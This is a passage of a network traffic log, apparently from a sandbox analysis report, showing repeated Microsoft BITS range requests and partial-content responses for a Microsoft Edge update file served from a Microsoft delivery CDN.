                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=29883-36913
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:47:50 GMT
                Content-Type: application/octet-stream
                Content-Length: 7031
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c822ee2-2915334016-9
                Ocn-Served-By: QLT
                Content-Range: bytes 29883-36913/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=36914-61652
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:47:52 GMT
                Content-Type: application/octet-stream
                Content-Length: 24739
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c8267c8-2915334016-10
                Ocn-Served-By: QLT
                Content-Range: bytes 36914-61652/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=61653-90097
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:47:55 GMT
                Content-Type: application/octet-stream
                Content-Length: 28445
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c82cd0f-2915334016-11
                Ocn-Served-By: QLT
                Content-Range: bytes 61653-90097/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=90098-128613
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:47:56 GMT
                Content-Type: application/octet-stream
                Content-Length: 38516
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c82ea31-2915334016-12
                Ocn-Served-By: QLT
                Content-Range: bytes 90098-128613/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=128614-174486
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:47:57 GMT
                Content-Type: application/octet-stream
                Content-Length: 45873
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c82fb84-2915334016-13
                Ocn-Served-By: QLT
                Content-Range: bytes 128614-174486/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=174487-188268
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:47:59 GMT
                Content-Type: application/octet-stream
                Content-Length: 13782
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c833133-2915334016-14
                Ocn-Served-By: QLT
                Content-Range: bytes 174487-188268/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=188269-222720
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:13 GMT
                Content-Type: application/octet-stream
                Content-Length: 34452
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c84bac6-2915334016-15
                Ocn-Served-By: QLT
                Content-Range: bytes 188269-222720/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=222721-228000
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:14 GMT
                Content-Type: application/octet-stream
                Content-Length: 5280
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c84e44b-2915334016-16
                Ocn-Served-By: QLT
                Content-Range: bytes 222721-228000/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=228001-242501
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:16 GMT
                Content-Type: application/octet-stream
                Content-Length: 14501
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c852044-2915334016-17
                Ocn-Served-By: QLT
                Content-Range: bytes 228001-242501/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=242502-283724
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:18 GMT
                Content-Type: application/octet-stream
                Content-Length: 41223
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c855195-2915334016-18
                Ocn-Served-By: QLT
                Content-Range: bytes 242502-283724/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=283725-342716
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:19 GMT
                Content-Type: application/octet-stream
                Content-Length: 58992
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c855e3a-2915334016-19
                Ocn-Served-By: QLT
                Content-Range: bytes 283725-342716/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=342717-438181
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:22 GMT
                Content-Type: application/octet-stream
                Content-Length: 95465
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c85b7ae-2915334016-20
                Ocn-Served-By: QLT
                Content-Range: bytes 342717-438181/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=438182-536827
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:23 GMT
                Content-Type: application/octet-stream
                Content-Length: 98646
                Connection: keep-alive
                Cache-Control: public, max-age=17280000
                X-AspNetMvc-Version: 5.3
                MS-CorrelationId: 6f60f8cc-e39b-44d3-b4d4-339059ed8366
                MS-RequestId: c8e2eff3-3eeb-4f9c-9dc9-9aaf7fc8a933
                MS-CV: y9dBBsu9vkmE74iU.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                X-Powered-By: ARR/3.0
                X-Powered-By: ASP.NET
                Last-Modified: Thu, 30 Jan 2025 22:24:43 GMT
                ETag: "Zn30nCFs7P9yX7o9FILxqytRM2k="
                X-CID: 9
                X-CCC: it
                Ocn-Cache-Status: HIT
                Ocn-Requestid: 100000054c85d7d7-2915334016-21
                Ocn-Served-By: QLT
                Content-Range: bytes 438182-536827/177180216
                Server: Qwilt
                X-OC-Service-Type: lo
              • flag-it
                GET
                http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d
                Remote address:
                91.80.49.86:80
                Request
                GET /filestreamingservice/files/0740036a-4e18-456d-96fa-d1d9c4ca4676?P1=1739897251&P2=404&P3=2&P4=aPHB6rY6xROKp%2bO7e0eE0dcTW5DNAwDHsKHN%2feizc5jsuqo9vLVA05xBd1hL7rEbKVkNuzcRST7QVNNHEpDnQA%3d%3d HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: identity
                If-Unmodified-Since: Thu, 30 Jan 2025 22:24:43 GMT
                Range: bytes=536828-608078
                User-Agent: Microsoft BITS/7.8
                X-Old-UID: {F07F94AD-2D61-421C-9371-9D3F6EAA16CE}; age=-1; cnt=2
                X-Last-HR: 0x80070422
                X-Last-HTTP-Status-Code: 500
                X-Retry-Count: 0
                X-HTTP-Attempts: 2
                Host: msedge.b.tlu.dl.delivery.mp.microsoft.com
                Response
                HTTP/1.1 206 Partial Content
                Date: Tue, 11 Feb 2025 16:48:26 GMT
                Content-Type: application/octet-stream
                Content-Length: 71251
                Connection: keep-alive
